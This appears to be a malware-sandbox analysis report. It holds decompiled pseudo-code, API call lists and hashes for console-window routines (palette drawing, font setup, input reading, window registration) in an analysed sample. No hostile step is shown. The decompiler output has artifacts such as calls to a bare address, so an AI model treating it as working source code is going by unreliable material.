                                                  • Instruction ID: d81bca949205ec7e410f01f95046e8cb68a31f38d723d6d9a6e6d421a50492ab
                                                  • Opcode Fuzzy Hash: 2e00a79dc07ff8ea0e03e896b10f3c0b96ef7051c37b4111a897907864eb7786
                                                  • Instruction Fuzzy Hash: E3511FB5900218AFDB10DF95DD49BDE7BB4BB48704F1084AAE608B72C0D7B95A84CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402234 Relevance: 21.1, APIs: 14, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E00402234(signed int __edx) {
				intOrPtr _t125;
				signed int _t130;
				void* _t149;

				L0:
				while(1) {
					L0:
					 *(_t149 - 4) =  *(_t149 - 4) + 1;
					L1:
					if( *(_t149 - 4) < 0x10) {
						L2:
						asm("cdq");
						_t130 = __edx & 0x00000007;
						asm("cdq");
						 *(_t149 - 0x10) = ( *(_t149 - 4) + _t130 >> 3) * ( *((intOrPtr*)(_t149 - 0x3c)) - _t130 >> 1);
						asm("cdq");
						 *(_t149 - 8) = ( *((intOrPtr*)(_t149 - 0x3c)) - _t130 >> 1) +  *(_t149 - 0x10);
						 *(_t149 - 0x14) = ( *(_t149 - 4) & 0x00000007) *  *(_t149 - 0x24);
						 *(_t149 - 0xc) =  *(_t149 - 0x14) +  *(_t149 - 0x24);
						 *(_t149 - 0x28) = CreateSolidBrush( *( *((intOrPtr*)(_t149 - 0x30)) + 4 +  *(_t149 - 4) * 4));
						FillRect( *(_t149 - 0x98), _t149 - 0x14,  *(_t149 - 0x28));
						DeleteObject( *(_t149 - 0x28));
						if(GetWindowLongW( *(_t149 + 8), 0) ==  *(_t149 - 4)) {
							L3:
							 *((intOrPtr*)(_t149 - 0x18)) = 2;
							 *(_t149 - 0x34) = SelectObject( *(_t149 - 0x98), GetStockObject(6));
							 *(_t149 - 0xc) =  *(_t149 - 0xc) - 1;
							 *(_t149 - 8) =  *(_t149 - 8) - 1;
							while(1) {
								L4:
								MoveToEx( *(_t149 - 0x98),  *(_t149 - 0x14),  *(_t149 - 8), 0);
								LineTo( *(_t149 - 0x98),  *(_t149 - 0x14),  *(_t149 - 0x10));
								LineTo( *(_t149 - 0x98),  *(_t149 - 0xc),  *(_t149 - 0x10));
								SelectObject( *(_t149 - 0x98), GetStockObject(7));
								LineTo( *(_t149 - 0x98),  *(_t149 - 0xc),  *(_t149 - 8));
								LineTo( *(_t149 - 0x98),  *(_t149 - 0x14),  *(_t149 - 8));
								_t125 =  *((intOrPtr*)(_t149 - 0x18)) - 1;
								 *((intOrPtr*)(_t149 - 0x18)) = _t125;
								if(_t125 == 0) {
									break;
								}
								L6:
								 *(_t149 - 0x14) =  *(_t149 - 0x14) + 1;
								 *(_t149 - 0x10) =  *(_t149 - 0x10) + 1;
								 *(_t149 - 0xc) =  *(_t149 - 0xc) - 1;
								 *(_t149 - 8) =  *(_t149 - 8) - 1;
								SelectObject( *(_t149 - 0x98), GetStockObject(6));
							}
							L5:
							L7:
							SelectObject( *(_t149 - 0x98),  *(_t149 - 0x34));
						}
						L8:
						continue;
					}
					L9:
					EndPaint( *(_t149 + 8), _t149 - 0x98);
					L10:
					L11:
					return 0;
					L12:
				}
			}






                                                  0x00402234
                                                  0x00402234
                                                  0x00402234
                                                  0x0040223a
                                                  0x0040223d
                                                  0x00402241
                                                  0x00402247
                                                  0x0040224a
                                                  0x0040224b
                                                  0x00402258
                                                  0x00402260
                                                  0x00402266
                                                  0x0040226e
                                                  0x0040227b
                                                  0x00402284
                                                  0x00402298
                                                  0x004022aa
                                                  0x004022b4
                                                  0x004022c9
                                                  0x004022cf
                                                  0x004022cf
                                                  0x004022ec
                                                  0x004022f5
                                                  0x004022fe
                                                  0x00402301
                                                  0x00402301
                                                  0x00402312
                                                  0x00402327
                                                  0x0040233c
                                                  0x00402352
                                                  0x00402367
                                                  0x0040237c
                                                  0x00402385
                                                  0x00402388
                                                  0x0040238b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040238f
                                                  0x00402395
                                                  0x0040239e
                                                  0x004023a7
                                                  0x004023b0
                                                  0x004023c3
                                                  0x004023c3
                                                  0x0040238d
                                                  0x004023ce
                                                  0x004023d9
                                                  0x004023d9
                                                  0x004023df
                                                  0x00000000
                                                  0x004023df
                                                  0x004023e4
                                                  0x004023ef
                                                  0x004024b6
                                                  0x004024b8
                                                  0x004024bb
                                                  0x00000000
                                                  0x004024bb

                                                  APIs
                                                  • CreateSolidBrush.GDI32(00000010), ref: 00402292
                                                  • FillRect.USER32 ref: 004022AA
                                                  • DeleteObject.GDI32(?), ref: 004022B4
                                                  • GetWindowLongW.USER32(?,00000000), ref: 004022C0
                                                  • GetStockObject.GDI32(00000006), ref: 004022D8
                                                  • SelectObject.GDI32(?,00000000), ref: 004022E6
                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00402312
                                                  • LineTo.GDI32(?,?,?), ref: 00402327
                                                  • LineTo.GDI32(?,?,?), ref: 0040233C
                                                  • GetStockObject.GDI32(00000007), ref: 00402344
                                                  • SelectObject.GDI32(?,00000000), ref: 00402352
                                                  • LineTo.GDI32(?,?,?), ref: 00402367
                                                  • LineTo.GDI32(?,?,?), ref: 0040237C
                                                  • GetStockObject.GDI32(00000006), ref: 004023B5
                                                  • SelectObject.GDI32(?,00000000), ref: 004023C3
                                                  • SelectObject.GDI32(?,?), ref: 004023D9
                                                  • EndPaint.USER32(?,?), ref: 004023EF
                                                  • GetClientRect.USER32 ref: 00402402
                                                  • SetWindowLongW.USER32 ref: 00402467
                                                  • GetParent.USER32(?), ref: 0040247A
                                                  • GetDlgItem.USER32 ref: 00402481
                                                  • InvalidateRect.USER32(00000000), ref: 00402488
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00402496
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Object$LineRectSelect$Stock$InvalidateLongWindow$BrushClientCreateDeleteFillItemMovePaintParentSolid
                                                  • String ID:
                                                  • API String ID: 326705783-0
                                                  • Opcode ID: 0f223b48c9c1fad625fe6f3797e3593d1823fe528c62288c8faa157e7c30c057
                                                  • Instruction ID: a2669e264eea661e60e1f78e57a3953fd2d4adc606f5a4596ff00acee2181a00
                                                  • Opcode Fuzzy Hash: 0f223b48c9c1fad625fe6f3797e3593d1823fe528c62288c8faa157e7c30c057
                                                  • Instruction Fuzzy Hash: 4741A8B5E10109EFCB44DFE8D988AEEBBB5AB4C300F108559F509E7254CA74AA44CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004070D0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 211COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 65%
                                                  			E004070D0(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				int _v32;
				int _v36;
				int _v40;
				int _v44;
				intOrPtr _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v4156;
				short _v12348;
				intOrPtr _t95;
				int _t96;
				intOrPtr _t115;
				void* _t144;
				void* _t145;

				_t144 = __edi;
				E0040A440();
				_v8 = _a4;
				if( *((intOrPtr*)(_v8 + 0xc)) != 0) {
					_t115 =  *((intOrPtr*)(_v8 + 0xb0));
					0x400000(_t115);
					_v48 = _t115;
					if(_v12 != 0) {
						0x400000("input setup failed: %#lx\n", _v12);
					}
				}
				_v28 = CreateEventW(0, 1, 0, 0);
				while(1) {
					_t95 =  *((intOrPtr*)(_v8 + 0xb0));
					0x400000(_t95, _v28, 0, 0,  &_v60,  &_v4156, 0x1000, 0, 0);
					_v12 = _t95;
					if(_v12 != 0x103) {
						goto L7;
					}
					0x400000(_v28, 0, 0);
					_v12 = _t95;
					if(_v12 == 0) {
						goto L7;
					}
					L31:
					EnterCriticalSection(0x41f57c);
					if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
						E00405A20(_v8, _v12, 0, 0, 0);
					}
					if( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v52 = 0;
						if(_v12 != 0) {
							0x400000("input restore failed: %#lx\n", _v12);
						}
					}
					CloseHandle( *(_v8 + 0xac));
					 *(_v8 + 0xac) = 0;
					LeaveCriticalSection(0x41f57c);
					return 0;
					L7:
					if(_v12 == 0) {
						EnterCriticalSection(0x41f57c);
						if( *((intOrPtr*)(_v8 + 0x1c)) == 0) {
							_v32 = 0;
						} else {
							_v32 = 1;
						}
						_t96 = _v32;
						_v44 = _t96;
						0x400000( &_v12348);
						_v36 = MultiByteToWideChar(E004042F0(_v56, _v8), 0,  &_v4156, _v56,  &_v12348, _t96);
						_v16 = 0;
						while(_v16 < _v36) {
							_v20 =  *((intOrPtr*)(_t145 + _v16 * 2 - 0x3038));
							_v24 = _v20 & 0x0000ffff;
							_v24 = _v24 - 3;
							if(_v24 > 0x7c) {
								L22:
								E00402130(_v20 & 0x0000ffff, _v8, _v20 & 0x0000ffff, 0);
								L23:
								_v16 = _v16 + 1;
								continue;
							}
							_t50 = _v24 + 0x4073a4; // 0xcccccc04
							switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M0040738C))) {
								case 0:
									LeaveCriticalSection(0x41f57c);
									goto L31;
								case 1:
									__eax = _v20 & 0x0000ffff;
									__ecx = _v8;
									__eax = E00404980(__edi, _v8, _v20 & 0x0000ffff, 0x48, 8);
									goto L23;
								case 2:
									__eax = E00404980(__edi, _v8, 0xa, 0xd, 8);
									goto L23;
								case 3:
									__eax = _v16;
									__ecx = __ebp + _v16 * 2 - 0x3036;
									__eax = E00405910(__edi, _v8, __ebp + _v16 * 2 - 0x3036, _v36 - _v16 - 1);
									_v16 = __eax;
									goto L23;
								case 4:
									_v8 = E00404980(__edi, _v8, 8, 8, 0);
									goto L23;
								case 5:
									goto L22;
							}
						}
						E00405270(_t144, _v8);
						if(_v44 == 0 &&  *((intOrPtr*)(_v8 + 0x1c)) != 0) {
							if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
								_v40 = 0;
							} else {
								_v40 = 1;
							}
							0x400000(_v40);
							E00405A20(_v8, 0, 0, 0, 1);
						}
						LeaveCriticalSection(0x41f57c);
						continue;
					}
					goto L31;
				}
			}
























                                                  0x004070d0
                                                  0x004070d8
                                                  0x004070e0
                                                  0x004070ea
                                                  0x004070ef
                                                  0x004070f6
                                                  0x004070fb
                                                  0x00407102
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00407102
                                                  0x00407120
                                                  0x00407123
                                                  0x00407142
                                                  0x00407149
                                                  0x0040714e
                                                  0x00407158
                                                  0x00000000
                                                  0x00000000
                                                  0x00407162
                                                  0x00407167
                                                  0x0040716e
                                                  0x00000000
                                                  0x00000000
                                                  0x0040730e
                                                  0x00407313
                                                  0x00407320
                                                  0x00407330
                                                  0x00407330
                                                  0x0040733c
                                                  0x0040733e
                                                  0x00407349
                                                  0x00407354
                                                  0x00407354
                                                  0x00407349
                                                  0x00407363
                                                  0x0040736c
                                                  0x0040737b
                                                  0x00407386
                                                  0x00407175
                                                  0x00407179
                                                  0x00407185
                                                  0x00407192
                                                  0x0040719d
                                                  0x00407194
                                                  0x00407194
                                                  0x00407194
                                                  0x004071a4
                                                  0x004071a7
                                                  0x004071b1
                                                  0x004071db
                                                  0x004071de
                                                  0x004071f0
                                                  0x00407207
                                                  0x0040720f
                                                  0x00407218
                                                  0x0040721f
                                                  0x0040729e
                                                  0x004072a9
                                                  0x004072ae
                                                  0x004071ed
                                                  0x00000000
                                                  0x004071ed
                                                  0x00407224
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407237
                                                  0x00000000
                                                  0x00000000
                                                  0x00407257
                                                  0x0040725c
                                                  0x00407260
                                                  0x00000000
                                                  0x00000000
                                                  0x0040724c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407271
                                                  0x00407274
                                                  0x00407280
                                                  0x00407288
                                                  0x00000000
                                                  0x00000000
                                                  0x00407297
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040722b
                                                  0x004072b7
                                                  0x004072c0
                                                  0x004072d2
                                                  0x004072dd
                                                  0x004072d4
                                                  0x004072d4
                                                  0x004072d4
                                                  0x004072e8
                                                  0x004072f9
                                                  0x004072f9
                                                  0x00407303
                                                  0x00000000
                                                  0x00407303
                                                  0x00000000
                                                  0x0040717b

                                                  APIs
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040711A
                                                  • EnterCriticalSection.KERNEL32(0041F57C), ref: 00407185
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 004071D5
                                                  • LeaveCriticalSection.KERNEL32(0041F57C), ref: 00407237
                                                  • EnterCriticalSection.KERNEL32(0041F57C,?,?,?), ref: 00407313
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00407363
                                                  • LeaveCriticalSection.KERNEL32(0041F57C), ref: 0040737B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ByteCharCloseCreateEventHandleMultiWide
                                                  • String ID: input restore failed: %#lx$input setup failed: %#lx$|
                                                  • API String ID: 3901266932-1979639224
                                                  • Opcode ID: dcac3e968452032e06e2bfb821b349b70bf670fe9cc7e7c651863d96417f59cf
                                                  • Instruction ID: d33cacd45055db96662674f4638ee13e701fdda32b95d152c692fed5d35c07b2
                                                  • Opcode Fuzzy Hash: dcac3e968452032e06e2bfb821b349b70bf670fe9cc7e7c651863d96417f59cf
                                                  • Instruction Fuzzy Hash: BD815C70E44208FBDB10DF94C946BEEB7B5BB48704F2081AAF5017A2C0C7786A85DF5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406360 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E00406360(intOrPtr _a4, LOGFONTW* _a8) {
				short* _v8;
				struct HDC__* _v12;
				short** _v16;
				short _v18;
				struct HFONT__* _v24;
				short** _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				struct tagTEXTMETRICW _v100;
				struct _cpinfo _v120;
				short _v184;
				int _t132;
				intOrPtr _t177;
				void* _t247;

				_v8 =  *((intOrPtr*)(_a4 + 8)) + 0x80;
				if( *( *((intOrPtr*)(_a4 + 0x84)) + 8) == 0 || _a8->lfHeight !=  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x82)) || _a8->lfWeight !=  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x84)) || (_a8->lfItalic & 0x000000ff) != 0 || (_a8->lfUnderline & 0x000000ff) != 0 || (_a8->lfStrikeOut & 0x000000ff) != 0) {
					L11:
					_v12 = GetDC( *(_a4 + 0xa8));
					if(_v12 != 0) {
						_v24 = CreateFontIndirectW(_a8);
						if(_v24 != 0) {
							_v40 = SelectObject(_v12, _v24);
							_t132 = GetTextMetricsW(_v12,  &_v100);
							0x400000( &_v184);
							 *(_v8 + 0xc) = GetTextFaceW(_v12, _t132,  &_v184) - 1;
							SelectObject(_v12, _v40);
							ReleaseDC( *(_a4 + 0xa8), _v12);
							 *_v8 = _v100.tmAveCharWidth;
							 *((short*)(_v8 + 2)) = _v100.tmHeight + _v100.tmExternalLeading;
							 *(_v8 + 6) = _v100.tmPitchAndFamily & 0x000000ff;
							 *((short*)(_v8 + 4)) = _v100.tmWeight;
							E0040DBEB( *((intOrPtr*)(_v8 + 8)));
							_push( *(_v8 + 0xc) << 1);
							 *((intOrPtr*)(_v8 + 8)) = E0040DC06();
							E0040CC90( *((intOrPtr*)(_v8 + 8)),  &_v184,  *(_v8 + 0xc) << 1);
							if(GetCPInfo( *(_a4 + 0xa4),  &_v120) != 0 && _v120 == 2) {
								 *_v8 = _v100.tmMaxCharWidth;
							}
							if( *( *((intOrPtr*)(_a4 + 0x84)) + 8) != 0) {
								DeleteObject( *( *((intOrPtr*)(_a4 + 0x84)) + 8));
							}
							 *( *((intOrPtr*)(_a4 + 0x84)) + 8) = _v24;
							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x28)) = _v100.tmExternalLeading;
							if( *( *((intOrPtr*)(_a4 + 0x84)) + 4) != 0) {
								DeleteObject( *( *((intOrPtr*)(_a4 + 0x84)) + 4));
								 *( *((intOrPtr*)(_a4 + 0x84)) + 4) = 0;
							}
							return 1;
						}
						ReleaseDC( *(_a4 + 0xa8), _v12);
						return 0;
					}
					return 0;
				} else {
					_v16 =  &(_a8->lfFaceName);
					_v28 =  &(_v16[0]);
					do {
						_v18 =  *_v16;
						_v16 =  &(_v16[0]);
					} while (_v18 != 0);
					_v32 = _v16 - _v28 >> 1;
					if( *( *((intOrPtr*)(_a4 + 8)) + 0x8c) != _v32) {
						goto L11;
					}
					_t177 = E0040B504( &(_a8->lfFaceName),  *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) + 0x88)),  *( *((intOrPtr*)(_a4 + 8)) + 0x8c) << 1);
					_t247 = _t247 + 0xc;
					_v36 = _t177;
					if(_v36 != 0) {
						goto L11;
					}
					return 1;
				}
			}


















                                                  0x00406375
                                                  0x00406385
                                                  0x0040646a
                                                  0x0040647a
                                                  0x00406481
                                                  0x00406494
                                                  0x0040649b
                                                  0x004064c6
                                                  0x004064d1
                                                  0x004064e5
                                                  0x004064fb
                                                  0x00406506
                                                  0x0040651a
                                                  0x00406527
                                                  0x00406533
                                                  0x0040653f
                                                  0x0040654a
                                                  0x00406555
                                                  0x00406565
                                                  0x00406571
                                                  0x0040658b
                                                  0x004065a9
                                                  0x004065b8
                                                  0x004065b8
                                                  0x004065c8
                                                  0x004065d7
                                                  0x004065d7
                                                  0x004065e9
                                                  0x004065f8
                                                  0x00406608
                                                  0x00406617
                                                  0x00406626
                                                  0x00406626
                                                  0x00000000
                                                  0x0040662d
                                                  0x004064ab
                                                  0x00000000
                                                  0x004064b1
                                                  0x00000000
                                                  0x004063e9
                                                  0x004063ef
                                                  0x004063f8
                                                  0x004063fb
                                                  0x00406401
                                                  0x00406405
                                                  0x00406409
                                                  0x00406418
                                                  0x0040642a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040644f
                                                  0x00406454
                                                  0x00406457
                                                  0x0040645e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406460

                                                  APIs
                                                  • _memcmp.LIBVCRUNTIME ref: 0040644F
                                                  • GetDC.USER32(?), ref: 00406474
                                                  • CreateFontIndirectW.GDI32(?), ref: 0040648E
                                                  • ReleaseDC.USER32 ref: 004064AB
                                                  • SelectObject.GDI32(00000000,00000000), ref: 004064C0
                                                  • GetTextMetricsW.GDI32(00000000,?), ref: 004064D1
                                                  • GetTextFaceW.GDI32(00000000,00000000), ref: 004064EF
                                                  • SelectObject.GDI32(00000000,?), ref: 00406506
                                                  • ReleaseDC.USER32 ref: 0040651A
                                                  • GetCPInfo.KERNEL32(?,?), ref: 004065A1
                                                  • DeleteObject.GDI32(00000000), ref: 004065D7
                                                  • DeleteObject.GDI32(00000000), ref: 00406617
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics_memcmp
                                                  • String ID:
                                                  • API String ID: 2694252524-0
                                                  • Opcode ID: d4a34128d0532f5ebc41287738e253f722d3f1e51ca31ee86009d61d125bde91
                                                  • Instruction ID: b9d7ba42646ab805e7765de740b74645fab4472f4a04deea8d5b249da7b72549
                                                  • Opcode Fuzzy Hash: d4a34128d0532f5ebc41287738e253f722d3f1e51ca31ee86009d61d125bde91
                                                  • Instruction Fuzzy Hash: A2A1E974A00209EFCB04CF94C594AAEB7B5FF48314F15C2A9E949AB341DB35EE85CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004046F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E004046F0(void* __edi, void* _a4) {
				signed int _v8;
				intOrPtr* _v12;
				short _v14;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				struct _WNDCLASSW _v76;
				struct _STARTUPINFOW _v144;
				void* _v176;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v300;
				char _v380;
				void* _t170;
				void* _t171;

				_t170 = __edi;
				 *((intOrPtr*)(_a4 + 0x84)) = 0x420f78;
				if(TranslateCharsetInfo(GetACP(),  &_v176, 2) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x20)) = _v176;
					GetStartupInfoW( &_v144);
					if(_v144.lpTitle == 0) {
						L15:
						E00404B80( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24)),  &_v380);
						if((_v144.dwFlags & 0x00000008) != 0) {
							_v272 = _v144.dwXCountChars;
							_v268 = _v144.dwYCountChars;
						}
						if((_v144.dwFlags & 0x00000010) != 0) {
							_v300 = _v144.dwFillAttribute;
						}
						_v76.style = 8;
						_v76.lpfnWndProc = E00408790;
						_v76.cbClsExtra = 0;
						_v76.cbWndExtra = 4;
						_v76.hInstance = GetModuleHandleW(0);
						_v76.hIcon = LoadIconW(0, 0x7f05);
						_v76.hCursor = LoadCursorW(0, 0x7f00);
						_v76.hbrBackground = GetStockObject(4);
						_v76.lpszMenuName = 0;
						_v76.lpszClassName = L"WineConsoleClass";
						RegisterClassW( &_v76);
						if(CreateWindowExW(0, _v76.lpszClassName, 0, 0xff0000, 0x80000000, 0x80000000, 0, 0, 0, 0, _v76.hInstance, _a4) != 0) {
							if(( *(_t171 + 0xffffffffffffff14) & 0x0000ffff) == 0) {
								E00406790(_t170, _a4,  &_v380);
							}
							E00401CB0(_a4,  &_v380);
							return 1;
						} else {
							return 0;
						}
					}
					_v12 = _v144.lpTitle;
					_v32 = _v12 + 2;
					do {
						_v14 =  *_v12;
						_v12 = _v12 + 2;
					} while (_v14 != 0);
					_v36 = _v12 - _v32 >> 1;
					_v20 = _v36;
					_push(_v20 + _v20 + 2);
					_v24 = E0040DC06();
					 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24)) = _v24;
					if(_v24 != 0) {
						_v8 = 0;
						while(_v8 < _v20) {
							if(( *(_v144.lpTitle + _v8 * 2) & 0x0000ffff) != 0x5c) {
								_v28 =  *(_v144.lpTitle + _v8 * 2) & 0x0000ffff;
							} else {
								_v28 = 0x5f;
							}
							 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24)) + _v8 * 2)) = _v28;
							_v8 = _v8 + 1;
						}
						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24)) + _v20 * 2)) = 0;
						goto L15;
					}
					return 0;
				}
				return 0;
			}




















                                                  0x004046f0
                                                  0x004046fc
                                                  0x0040471e
                                                  0x00404736
                                                  0x00404740
                                                  0x0040474a
                                                  0x00404821
                                                  0x00404835
                                                  0x00404840
                                                  0x00404845
                                                  0x0040484e
                                                  0x0040484e
                                                  0x0040485a
                                                  0x0040485f
                                                  0x0040485f
                                                  0x00404865
                                                  0x0040486c
                                                  0x00404873
                                                  0x0040487a
                                                  0x00404889
                                                  0x00404899
                                                  0x004048a9
                                                  0x004048b4
                                                  0x004048b7
                                                  0x004048be
                                                  0x004048c9
                                                  0x004048fe
                                                  0x00404916
                                                  0x00404923
                                                  0x00404923
                                                  0x00404933
                                                  0x00000000
                                                  0x00404900
                                                  0x00000000
                                                  0x00404900
                                                  0x004048fe
                                                  0x00404753
                                                  0x0040475c
                                                  0x0040475f
                                                  0x00404765
                                                  0x00404769
                                                  0x0040476d
                                                  0x0040477c
                                                  0x00404782
                                                  0x0040478c
                                                  0x00404795
                                                  0x004047a4
                                                  0x004047ab
                                                  0x004047b4
                                                  0x004047c6
                                                  0x004047db
                                                  0x004047f0
                                                  0x004047dd
                                                  0x004047dd
                                                  0x004047dd
                                                  0x00404806
                                                  0x004047c3
                                                  0x004047c3
                                                  0x0040481d
                                                  0x00000000
                                                  0x0040481d
                                                  0x00000000
                                                  0x004047ad
                                                  0x00000000

                                                  APIs
                                                  • GetACP.KERNEL32(?,00000002), ref: 0040470F
                                                  • TranslateCharsetInfo.GDI32(00000000), ref: 00404716
                                                  • GetStartupInfoW.KERNEL32(?), ref: 00404740
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Info$CharsetStartupTranslate
                                                  • String ID: _
                                                  • API String ID: 3822699805-701932520
                                                  • Opcode ID: 8e78b50df1e67cab56e8d9dab4517ea9b7649776dc4ede3edf63efa29e8267e4
                                                  • Instruction ID: 21d27d1c2dd65001b37253adb57114a482a244c2a073b6c0f5737e405ff2358a
                                                  • Opcode Fuzzy Hash: 8e78b50df1e67cab56e8d9dab4517ea9b7649776dc4ede3edf63efa29e8267e4
                                                  • Instruction Fuzzy Hash: F67121B4A00209DFDB14DF94C985BEEBBB1FF48704F108169EA05AB391DB74A941CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408790 Relevance: 12.3, APIs: 8, Instructions: 340windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E00408790(void* __edi, int _a4, int _a8, signed int _a12, signed int _a16) {
				long _v8;
				signed int _v12;
				int _v16;
				signed int _v20;
				void _v24;
				signed int _v28;
				int _v32;
				struct HBITMAP__* _v36;
				struct HBITMAP__* _v40;
				signed int _v44;
				int _v48;
				int _v52;
				int _v56;
				signed int _v60;
				int _v64;
				struct HBITMAP__* _v68;
				signed int _v72;
				signed int _v76;
				int _v80;
				signed int _v84;
				int _v88;
				signed int _v92;
				struct tagPOINT _v100;
				struct tagPAINTSTRUCT _v164;
				int _t570;
				long _t573;
				long _t602;
				long _t637;

				_v8 = GetWindowLongW(_a4, 0);
				_v16 = _a8;
				if(_v16 > 0xf) {
					if(_v16 > 0x111) {
						if(_v16 > 0x401) {
							L177:
							return DefWindowProcW(_a4, _a8, _a12, _a16);
						}
						if(_v16 == 0x401) {
							L15:
							_t602 = _v8;
							__eflags =  *(_t602 + 0x84);
							if( *(_t602 + 0x84) != 0) {
								_t570 =  *(_v8 + 0x84);
								__eflags =  *((intOrPtr*)(_t570 + 0x64)) - 1;
								if( *((intOrPtr*)(_t570 + 0x64)) == 1) {
									E00407B50(_v8);
								}
							}
							L178:
							__eflags = 0;
							return 0;
						}
						_v16 = _v16 - 0x112;
						if(_v16 > 0xf8) {
							goto L177;
						}
